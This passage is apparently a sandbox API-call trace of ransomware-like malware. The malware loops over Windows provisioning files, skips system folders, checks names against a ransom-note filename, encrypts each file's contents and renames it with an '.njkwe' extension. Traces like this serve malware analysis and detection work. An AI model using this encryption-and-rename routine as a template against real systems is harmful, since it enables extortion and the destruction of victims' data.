nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.603] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.603] CloseHandle (hObject=0x43c) returned 1 [0079.603] GetProcessHeap () returned 0xbe0000 [0079.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.603] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0079.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\450__connections_cellular_kktcell (turkey)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\450__Connections_Cellular_KKTCELL (Turkey)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\450__connections_cellular_kktcell (turkey)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.604] GetProcessHeap () returned 0xbe0000 [0079.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.604] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9104a28e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9104a28e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9104a28e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", cAlternateFileName="451__C~1.PRO")) returned 1 [0079.604] lstrcmpiW (lpString1="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.604] lstrcmpiW (lpString1="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.604] lstrcmpiW (lpString1="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.604] lstrcmpiW (lpString1="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.604] lstrcmpiW (lpString1="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.604] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml") returned 161 [0079.604] StrStrIW (lpFirst="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.604] lstrcmpW (lpString1="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.605] lstrcmpW (lpString1="451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.605] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\451__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.605] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\451__connections_cellular_turkcell (turkey)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.606] GetTickCount () returned 0x115438d [0079.606] GetTickCount () returned 0x115438d [0079.606] GetTickCount () returned 0x115438d [0079.606] GetTickCount () returned 0x115438d [0079.606] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.606] GetProcessHeap () returned 0xbe0000 [0079.606] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.606] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0079.607] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.607] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0079.608] GetProcessHeap () returned 0xbe0000 [0079.608] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.608] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.608] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.608] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.608] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.608] CloseHandle (hObject=0x43c) returned 1 [0079.608] GetProcessHeap () returned 0xbe0000 [0079.608] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.608] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0079.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\451__connections_cellular_turkcell (turkey)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\451__Connections_Cellular_Turkcell (Turkey)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\451__connections_cellular_turkcell (turkey)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.609] GetProcessHeap () returned 0xbe0000 [0079.609] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.609] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9104a28e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9104a28e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9104a28e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", cAlternateFileName="452__C~1.PRO")) returned 1 [0079.609] lstrcmpiW (lpString1="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.609] lstrcmpiW (lpString1="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.609] lstrcmpiW (lpString1="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.609] lstrcmpiW (lpString1="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.609] lstrcmpiW (lpString1="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.609] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml") returned 161 [0079.609] StrStrIW (lpFirst="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.609] lstrcmpW (lpString1="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.609] lstrcmpW (lpString1="452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.609] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\452__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.609] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\452__connections_cellular_turkcell (turkey)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.610] GetTickCount () returned 0x115439d [0079.610] GetTickCount () returned 0x115439d [0079.610] GetTickCount () returned 0x115439d [0079.610] GetTickCount () returned 0x115439d [0079.610] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.610] GetProcessHeap () returned 0xbe0000 [0079.610] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.610] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0079.612] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.612] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0079.613] GetProcessHeap () returned 0xbe0000 [0079.613] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.613] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.613] CloseHandle (hObject=0x43c) returned 1 [0079.613] GetProcessHeap () returned 0xbe0000 [0079.613] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.613] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0079.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\452__connections_cellular_turkcell (turkey)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\452__Connections_Cellular_Turkcell (Turkey)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\452__connections_cellular_turkcell (turkey)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.615] GetProcessHeap () returned 0xbe0000 [0079.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.615] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910704f6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910704f6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910704f6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", cAlternateFileName="453__C~1.PRO")) returned 1 [0079.615] lstrcmpiW (lpString1="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.615] lstrcmpiW (lpString1="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.615] lstrcmpiW (lpString1="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.615] lstrcmpiW (lpString1="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.615] lstrcmpiW (lpString1="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.615] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml") returned 161 [0079.615] StrStrIW (lpFirst="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.615] lstrcmpW (lpString1="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.615] lstrcmpW (lpString1="453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.615] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\453__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.615] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\453__connections_cellular_turkcell (turkey)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.616] GetTickCount () returned 0x115439d [0079.616] GetTickCount () returned 0x115439d [0079.616] GetTickCount () returned 0x115439d [0079.616] GetTickCount () returned 0x115439d [0079.616] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.616] GetProcessHeap () returned 0xbe0000 [0079.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.616] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0079.618] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.618] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0079.618] GetProcessHeap () returned 0xbe0000 [0079.618] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.618] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.618] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.618] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.618] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.618] CloseHandle (hObject=0x43c) returned 1 [0079.619] GetProcessHeap () returned 0xbe0000 [0079.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.619] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0079.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\453__connections_cellular_turkcell (turkey)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\453__Connections_Cellular_Turkcell (Turkey)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\453__connections_cellular_turkcell (turkey)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.619] GetProcessHeap () returned 0xbe0000 [0079.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.619] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910704f6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910704f6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910704f6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", cAlternateFileName="454__C~1.PRO")) returned 1 [0079.623] lstrcmpiW (lpString1="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.623] lstrcmpiW (lpString1="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.623] lstrcmpiW (lpString1="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.623] lstrcmpiW (lpString1="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.623] lstrcmpiW (lpString1="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.623] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml") returned 164 [0079.623] StrStrIW (lpFirst="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.623] lstrcmpW (lpString1="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.623] lstrcmpW (lpString1="454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.623] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\454__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.623] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\454__Connections_Cellular_Vodafone TR (Turkey)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\454__connections_cellular_vodafone tr (turkey)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.623] GetTickCount () returned 0x11543ac [0079.623] GetTickCount () returned 0x11543ac [0079.623] GetTickCount () returned 0x11543ac [0079.623] GetTickCount () returned 0x11543ac [0079.623] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.623] GetProcessHeap () returned 0xbe0000 [0079.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.624] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, 